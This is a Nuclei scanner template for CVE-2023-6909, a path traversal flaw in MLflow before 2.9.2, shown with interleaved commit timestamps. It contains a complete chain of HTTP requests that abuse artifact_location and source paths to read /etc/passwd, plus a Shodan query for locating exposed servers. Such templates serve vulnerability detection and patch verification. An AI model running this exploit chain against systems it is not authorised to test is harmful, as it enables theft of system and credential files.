2024-02-02 10:20:55 +00:00
|
|
|
id: CVE-2023-6909
|
|
|
|
|
|
|
|
info:
|
2024-02-02 16:58:16 +00:00
|
|
|
name: Mlflow <2.9.2 - Path Traversal
|
2024-02-02 10:20:55 +00:00
|
|
|
author: Hyunsoo-ds
|
|
|
|
severity: critical
|
|
|
|
description: |
|
2024-02-02 16:58:16 +00:00
|
|
|
Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.
|
2024-02-02 10:20:55 +00:00
|
|
|
reference:
|
|
|
|
- https://huntr.com/bounties/11209efb-0f84-482f-add0-587ea6b7e850/
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-6909
|
|
|
|
- https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1
|
2024-03-04 08:20:22 +00:00
|
|
|
impact: |
|
|
|
|
Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations.
|
|
|
|
remediation: |
|
|
|
|
To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0.
|
2024-02-02 10:20:55 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
|
|
|
|
cvss-score: 9.3
|
|
|
|
cve-id: CVE-2023-6909
|
|
|
|
cwe-id: CWE-29
|
|
|
|
metadata:
|
2024-03-04 08:20:22 +00:00
|
|
|
max-request: 5
|
2024-02-02 10:20:55 +00:00
|
|
|
verified: true
|
|
|
|
vendor: lfprojects
|
|
|
|
product: mlflow
|
2024-03-04 08:20:22 +00:00
|
|
|
shodan-query: "http.title:\"mlflow\""
|
2024-02-02 16:58:16 +00:00
|
|
|
tags: cve,cve2023,mlflow,lfi
|
2024-02-02 10:20:55 +00:00
|
|
|
|
|
|
|
http:
|
|
|
|
- raw:
|
2024-02-02 16:58:16 +00:00
|
|
|
- |
|
|
|
|
POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
{"name" : "{{randstr}}", "artifact_location": "http:///?/../../../../../../../../../../../../../../etc/"}
|
|
|
|
|
|
|
|
- |
|
|
|
|
POST /api/2.0/mlflow/runs/create HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
2024-02-02 10:20:55 +00:00
|
|
|
|
2024-02-02 16:58:16 +00:00
|
|
|
{"experiment_id": "{{EXPERIMENT_ID}}"}
|
2024-02-02 10:20:55 +00:00
|
|
|
|
2024-02-02 16:58:16 +00:00
|
|
|
- |
|
|
|
|
POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
2024-02-02 10:20:55 +00:00
|
|
|
|
2024-02-02 16:58:16 +00:00
|
|
|
{"name": "{{randstr}}"}
|
2024-02-02 10:20:55 +00:00
|
|
|
|
2024-02-02 16:58:16 +00:00
|
|
|
- |
|
|
|
|
POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
2024-02-02 10:20:55 +00:00
|
|
|
|
2024-02-02 16:58:16 +00:00
|
|
|
{"name" : "{{randstr}}", "run_id": "{{RUN_ID}}", "source" : "file:///etc/"}
|
2024-02-02 10:20:55 +00:00
|
|
|
|
2024-02-02 16:58:16 +00:00
|
|
|
- |
|
|
|
|
GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version=1 HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
2024-02-02 10:20:55 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
part: body
|
|
|
|
regex:
|
|
|
|
- "root:.*:0:0:"
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header_5
|
|
|
|
words:
|
|
|
|
- "filename=passwd"
|
|
|
|
- "application/octet-stream"
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
|
|
|
|
extractors:
|
|
|
|
- type: json
|
|
|
|
part: body_1
|
|
|
|
name: EXPERIMENT_ID
|
|
|
|
group: 1
|
|
|
|
json:
|
|
|
|
- '.experiment_id'
|
|
|
|
internal: true
|
|
|
|
|
|
|
|
- type: json
|
|
|
|
part: body_2
|
|
|
|
name: RUN_ID
|
|
|
|
group: 1
|
|
|
|
json:
|
|
|
|
- '.run.info.run_id'
|
|
|
|
internal: true
|
2024-03-04 09:35:31 +00:00
|
|
|
# digest: 4b0a00483046022100dc4c33652fcf1a1d0dc29690ac81838de82d0c439cc405cb3b0296d4e10cb855022100b3a49f754395ee217ea12cc561be556cc6c3a8da3facee851d5f37fdbab72d61:922c64590222798bb761d5b6d8e72950
|